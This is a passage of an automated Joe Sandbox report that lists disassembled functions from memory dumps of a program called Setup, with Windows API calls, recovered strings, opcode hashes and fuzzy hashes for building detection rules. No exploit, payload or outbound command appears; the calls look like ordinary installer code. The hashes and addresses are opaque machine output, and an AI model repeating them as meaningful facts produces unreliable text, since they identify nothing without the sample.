                                                                                                                                                                      • Part of subcall function 69DC8EAB: _memcpy_s.LIBCMT ref: 69DC8EFC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$AppendPath_memcpy_s
                                                                                                                                                                    • String ID: %TEMP%
                                                                                                                                                                    • API String ID: 3727483831-235365282
                                                                                                                                                                    • Opcode ID: 4e1f4e7445958a902ff9bd0045df5e7cd2627af8d1b92cfdd6fb8a51f68db793
                                                                                                                                                                    • Instruction ID: d12807ad4ae913c307b1f03c449465a292e8e64874f1a04549686f1a8183be42
                                                                                                                                                                    • Opcode Fuzzy Hash: 4e1f4e7445958a902ff9bd0045df5e7cd2627af8d1b92cfdd6fb8a51f68db793
                                                                                                                                                                    • Instruction Fuzzy Hash: AF217F3690014ACFCF00DBB8C841BEEBBB8AF01328F549674D560EBBD5CB749A148762
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DBA11D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: %TEMP%
                                                                                                                                                                    • API String ID: 431132790-235365282
                                                                                                                                                                    • Opcode ID: 9f9cb2a75e113a3b702b03e87c26739846286b6654184032f9763149a8201c79
                                                                                                                                                                    • Instruction ID: 5ddd7b4f3218a043c3afb36e9fd35e04cd2120a9ba89809a0f077d9278c00f33
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f9cb2a75e113a3b702b03e87c26739846286b6654184032f9763149a8201c79
                                                                                                                                                                    • Instruction Fuzzy Hash: 72211A7561021AEBDB00DFA4CC49AAE7B75BF04355F408534F921AB590DB70DA15CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D82677 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8267E
                                                                                                                                                                      • Part of subcall function 69D789B7: __EH_prolog3.LIBCMT ref: 69D789BE
                                                                                                                                                                      • Part of subcall function 69D789B7: __CxxThrowException@8.LIBCMT ref: 69D78A89
                                                                                                                                                                      • Part of subcall function 69D82811: __EH_prolog3.LIBCMT ref: 69D82818
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: ReturnCode
                                                                                                                                                                    • API String ID: 2489616738-1214168914
                                                                                                                                                                    • Opcode ID: 6b0574979b165b0194da6d128def98913b1ca5261d360f75ad54d1053ab540a3
                                                                                                                                                                    • Instruction ID: 612c849de39b3913df9ca501546c73eb9f99b64c6167336a92f30bb4b495a81e
                                                                                                                                                                    • Opcode Fuzzy Hash: 6b0574979b165b0194da6d128def98913b1ca5261d360f75ad54d1053ab540a3
                                                                                                                                                                    • Instruction Fuzzy Hash: CA2138B5900215EFCB00CFA8C881A9E7BA8BF49718B148569F824DF786CB70D910CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB9293 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCommandLineW.KERNEL32(F0D05EFD,69DA831D,?,00000000,69DE4C14,000000FF,?,69DA7793,?,00000000), ref: 69DB92BF
                                                                                                                                                                      • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                      • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$CommandLine
                                                                                                                                                                    • String ID: repair
                                                                                                                                                                    • API String ID: 1384747822-2397320225
                                                                                                                                                                    • Opcode ID: c4275949c844008ac7cf8fb88470ca89e17d755b02322b0e261d98cbeae6e71d
                                                                                                                                                                    • Instruction ID: 3eed3551869c41fb9118c4a3a26e153e166dcb5af2f434d02f20df6e70a562a4
                                                                                                                                                                    • Opcode Fuzzy Hash: c4275949c844008ac7cf8fb88470ca89e17d755b02322b0e261d98cbeae6e71d
                                                                                                                                                                    • Instruction Fuzzy Hash: AD11C876548740EBD710CB54CC41F9AB3DCFB59728F004A3AF9629BAD4DB30D5048791
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698DFF39 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 698DFF6A
                                                                                                                                                                      • Part of subcall function 698F76EE: _calloc.LIBCMT ref: 698F770F
                                                                                                                                                                      • Part of subcall function 698F83FD: __CxxThrowException@8.LIBCMT ref: 698F83E2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8PlacementThrowWindow_calloc
                                                                                                                                                                    • String ID: ,
                                                                                                                                                                    • API String ID: 1982324250-3772416878
                                                                                                                                                                    • Opcode ID: e5c2c307a6692ba9425d331c22e28365a63a4261021384fd4afced91bd12f242
                                                                                                                                                                    • Instruction ID: 8df68dc781cccdeca38f57378b485d66692a063e16c64ea0b188cb943bea61d2
                                                                                                                                                                    • Opcode Fuzzy Hash: e5c2c307a6692ba9425d331c22e28365a63a4261021384fd4afced91bd12f242
                                                                                                                                                                    • Instruction Fuzzy Hash: AD113076A10209EFDB00DFA9D98099EF7F5FF49314B61882EE859E7200D730B955DBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D94682 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D94689
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: #(loc.
                                                                                                                                                                    • API String ID: 431132790-1630946291
                                                                                                                                                                    • Opcode ID: 73aee22a72c408c4176d4378134b7f48f311022a2528566b919247532e08d3a6
                                                                                                                                                                    • Instruction ID: e747e06acf555ba749f4ecbba980e80e6af877d5bdabc42603be3089edf0e66c
                                                                                                                                                                    • Opcode Fuzzy Hash: 73aee22a72c408c4176d4378134b7f48f311022a2528566b919247532e08d3a6
                                                                                                                                                                    • Instruction Fuzzy Hash: 2011BA79900249DFCF00DFA8C845AEDB7B4BF14328F508665F920AB794C774DA558BA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D897CE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D897D5
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: RetryHelper
                                                                                                                                                                    • API String ID: 431132790-1997034708
                                                                                                                                                                    • Opcode ID: 4de32f99b96f695e01688270a1708ea7be127cfa93342da0e040571f578eacc8
                                                                                                                                                                    • Instruction ID: cd9116182ce1df1c11bafd031cf52ddbe21b3bc8541531482b721349a8bf7408
                                                                                                                                                                    • Opcode Fuzzy Hash: 4de32f99b96f695e01688270a1708ea7be127cfa93342da0e040571f578eacc8
                                                                                                                                                                    • Instruction Fuzzy Hash: 11F017B5900759DFCB10DFA8C900AAEBBB4BF14214B00C839E4A9D7B41D3309A14CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7388B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: Entering Function
                                                                                                                                                                    • API String ID: 431132790-2002471330
                                                                                                                                                                    • Opcode ID: e6dfdd40f1a6041f5ab7be2e313a84c6f7010d67a63186299efbafb93badbc43
                                                                                                                                                                    • Instruction ID: 782a7ea141319b675492248683bec71c0cde41ff492f773c2dd19b38922f1715
                                                                                                                                                                    • Opcode Fuzzy Hash: e6dfdd40f1a6041f5ab7be2e313a84c6f7010d67a63186299efbafb93badbc43
                                                                                                                                                                    • Instruction Fuzzy Hash: 95F03279600201DFCB10DF68C940B9DBBE0EF54614F50C829E885CBB10CB34E854CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D738D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • exiting function/method, xrefs: 69D738EF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: exiting function/method
                                                                                                                                                                    • API String ID: 431132790-2452647166
                                                                                                                                                                    • Opcode ID: 5478fb1c8b91c789d8f8a649f0eb3a2b814df35bc6d9d488d5b6e3c2504664dc
                                                                                                                                                                    • Instruction ID: 6f9c20ee4c4f1e18ab9596feba8c2b4cc91837de1a7e2fab613dde94821a031a
                                                                                                                                                                    • Opcode Fuzzy Hash: 5478fb1c8b91c789d8f8a649f0eb3a2b814df35bc6d9d488d5b6e3c2504664dc
                                                                                                                                                                    • Instruction Fuzzy Hash: 76E0C239240601DFC700DFA8C158F09B7A1FF58315F50C468E6569BBA0CB31E814CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D74412 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D74419
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D73C8F: __EH_prolog3.LIBCMT ref: 69D73C96
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: ParameterFolder
                                                                                                                                                                    • API String ID: 431132790-2570462325
                                                                                                                                                                    • Opcode ID: 82487e3e1fc5a35647e37b0a9cd0fcae4700b3d3f116a4986dcad9461e5b76a9
                                                                                                                                                                    • Instruction ID: c1e9756015988908f1e4e69bc385b83aec9158ec97eb2f2c64de065f16cb2a75
                                                                                                                                                                    • Opcode Fuzzy Hash: 82487e3e1fc5a35647e37b0a9cd0fcae4700b3d3f116a4986dcad9461e5b76a9
                                                                                                                                                                    • Instruction Fuzzy Hash: 49E01AB9900119ABDF10EBA4CC00BBDB775BF10318F50D624E5206AA90C734AA289B64
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E09A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(RICHED20.DLL,?,698ECA98,00000000,00000001,?,80070057,698D5D9C,?,00000030,80070057), ref: 698E09C9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                    • String ID: RICHED20.DLL
                                                                                                                                                                    • API String ID: 1029625771-992299850
                                                                                                                                                                    • Opcode ID: b9c57244032c183d966056c215c44c61b999c39bb5bc9beeb4a4ebe5c1dcda7d
                                                                                                                                                                    • Instruction ID: b4235256702f6d315ce4229823d636ac515ddc83d1156619d8cb70fd9cfa2c58
                                                                                                                                                                    • Opcode Fuzzy Hash: b9c57244032c183d966056c215c44c61b999c39bb5bc9beeb4a4ebe5c1dcda7d
                                                                                                                                                                    • Instruction Fuzzy Hash: E6E0F6B1901B408F87608FABA944546FAF8BFAA6103504A1FE08AC3A24D2B0A549CF94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69A73536 Relevance: 3.2, APIs: 2, Instructions: 213COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ctype.LIBCPMT ref: 69A82015
                                                                                                                                                                    • ctype.LIBCPMT ref: 69A8202A
                                                                                                                                                                      • Part of subcall function 69A717EB: malloc.MSVCRT ref: 69A717F6
                                                                                                                                                                      • Part of subcall function 69A72885: InitializeCriticalSectionAndSpinCount.KERNEL32(00000004,00000FA0,?,00000000,00000000), ref: 69A728C4
                                                                                                                                                                      • Part of subcall function 69A73992: EnterCriticalSection.KERNEL32(?,00000000,69A7397F,00000000,69A7371E,80004005), ref: 69A739AE
                                                                                                                                                                      • Part of subcall function 69A72C9B: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,69A727B0,00000000,69A90088), ref: 69A72D01
                                                                                                                                                                      • Part of subcall function 69A72C9B: VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,000003F8,00000000,?,?,?,?,69A727B0,00000000,69A90088), ref: 69A72D4F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocCriticalSectionVirtualctype$CountEnterInitializeSpinmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 738331480-0
                                                                                                                                                                    • Opcode ID: 906ccf8588717a9bb434c4b4f035eb248454a912b87314473f5535fe73c70ca7
                                                                                                                                                                    • Instruction ID: 7646e67acaa5ee5ada97621761fcb185e147af92c89ce4bc273076366517faa5
                                                                                                                                                                    • Opcode Fuzzy Hash: 906ccf8588717a9bb434c4b4f035eb248454a912b87314473f5535fe73c70ca7
                                                                                                                                                                    • Instruction Fuzzy Hash: 6771C139560340AFDB248F14CA82F7A3AE9BB01F88F15846DED61DE6A1CB71D8C5CB40
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D73C8F Relevance: 3.1, APIs: 2, Instructions: 135COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D73C96
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
                                                                                                                                                                    • _wcspbrk.LIBCMT ref: 69D73DF7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$_wcspbrk
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1958752295-0
                                                                                                                                                                    • Opcode ID: cf46fb1e83ecb2b892f25abfcf9e1675b1228d239281f0de80e87377df22ed30
                                                                                                                                                                    • Instruction ID: 393db739b3f8ce23ce20549118a0ff4f24a86ebf670945faa1451b5ea66feb66
                                                                                                                                                                    • Opcode Fuzzy Hash: cf46fb1e83ecb2b892f25abfcf9e1675b1228d239281f0de80e87377df22ed30
                                                                                                                                                                    • Instruction Fuzzy Hash: E841B335600245DBCB10EFB8D880AADBBA6AF44328F14D235FD25DFB81DB74DA158762
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D84613 Relevance: 3.1, APIs: 2, Instructions: 59registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69DC847A: RegCloseKey.ADVAPI32(?,?,?,69D8463B,00000034,00000034,00000000), ref: 69DC84BA
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,00000034,00000034,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,69D842F8,69D6A794,02602230), ref: 69D8468D
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,69D842F8,69D6A794,02602230), ref: 69D8469E
                                                                                                                                                                      • Part of subcall function 69DC83D2: RegQueryValueExW.ADVAPI32(00000000,00000034,00000000,00000034,00000034,00000000,?,?,69D84685,?,?,69D842F8,00000034,00000034,00000034,00000034), ref: 69DC83F4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
